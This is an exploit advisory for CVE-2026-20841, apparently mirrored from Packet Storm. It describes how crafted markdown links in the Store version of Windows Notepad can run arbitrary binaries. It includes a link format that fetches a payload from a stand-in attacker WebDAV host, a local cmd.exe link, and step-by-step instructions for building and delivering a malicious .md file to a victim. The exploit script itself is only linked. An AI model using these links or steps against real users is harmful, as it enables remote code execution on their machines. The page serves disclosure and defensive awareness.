Share
## https://sploitus.com/exploit?id=PACKETSTORM:216245
# Exploit Title: Windows Notepad App (Store Version) - Remote/Local
    Code Execution via Markdown Link
    # Date: 2026-02-26
    # Exploit Author: nu11secur1ty
    # Vendor Homepage: https://www.microsoft.com
    # Software Link: https://apps.microsoft.com/detail/9msmlrh6lzf3
    # Version: Windows Notepad App versions 11.0.0 through 11.2510.14.0
    # Tested on: Windows 11 (Notepad 11.2510.14.0)
    # CVE: CVE-2026-20841
    # CVSS: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
    
    Description:
    The Windows Notepad App (Microsoft Store version) fails to properly validate
    protocol handlers in markdown links. When a user Ctrl+Click on a crafted link
    in a .md file, Notepad passes the raw URI to ShellExecuteExW() without
    sufficient filtering . This allows execution of arbitrary binaries
    in TWO distinct attack scenarios:
    
    1. REMOTE CODE EXECUTION (RCE) - Network Scenario:
       - Attacker hosts payload on WebDAV/SMB share
       - Link format: `file:///\\attacker@port\DavWWWRoot\payload.py`
       - Windows fetches and executes remote payload when clicked
       - Confirmed by Microsoft: "load and execute remote files"
    
    2. LOCAL CODE EXECUTION - Offline Scenario:
       - Attacker with local access executes system binaries
       - Link format: `file://C:/Windows/System32/cmd.exe`
       - No network required - payloads already on disk
    
    Affected versions: 11.0.0 through 11.2510.14.0
    Fixed in: 11.2510.14.0+ (requires manual Store update)
    
    Note: The patch adds a warning dialog but does NOT block execution
    
    Usage:
    1. Modify the attacker IP in remote payloads to your machine
    2. Run the script to generate malicious .md file
    3. Host payloads on WebDAV/SMB server (for remote attack)
    4. Deliver .md file to target
    5. Victim opens in vulnerable Notepad and Ctrl+Click any link
    
    # Exploit:
    [href](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2026/CVE-2026-20841/exploit.md)
    
    
    
    -- 
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstorm.news/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>